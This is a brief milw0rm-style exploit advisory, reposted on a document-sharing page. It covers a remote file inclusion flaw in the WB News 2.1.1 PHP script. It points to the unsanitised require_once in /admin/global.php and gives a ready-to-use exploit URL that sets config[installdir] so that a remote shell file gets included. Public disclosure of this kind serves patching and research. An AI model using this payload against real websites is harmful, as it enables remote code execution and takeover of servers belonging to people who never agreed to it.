WB News 2.1.1 configinstalldir Remote File Inclusion Vulnerability by h3m4n

VIEWS: 29 PAGES: 1

									                   WB News 2.1.1 configinstalldir Remote File Inclusion Vulnerability   Page 1/1
  1    −−−−−−−−−−−−−−−−−:Remote File Include:−−−−−−−−−−−−−−−−−
  2    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  3    script:wb news v2.1.1
  4
  5    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  6    download from:http://www.webmobo.com/downloads/
  7
  8    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  9
  10   .......................................................
  11   vul: /admin/global.php line 32;
  12
  13
  14   require_once( $config["installdir"] . "/includes/constants.php" );
  15
  16   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  17   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  18
  19   xpl:
  20
  21   http://127.0.0.1/admin/global.php?config[installdir]=shell.txt?
  22
  23   ***************************************************
  24   ***************************************************
  25   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  26   Author: ahmadbady [kivi_hacker666@yahoo.com]
  27
  28   from[iran]
  29   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  30
  31   # milw0rm.com [2009−02−09]




ahmadbady                                                                               02/09/2009

								
To top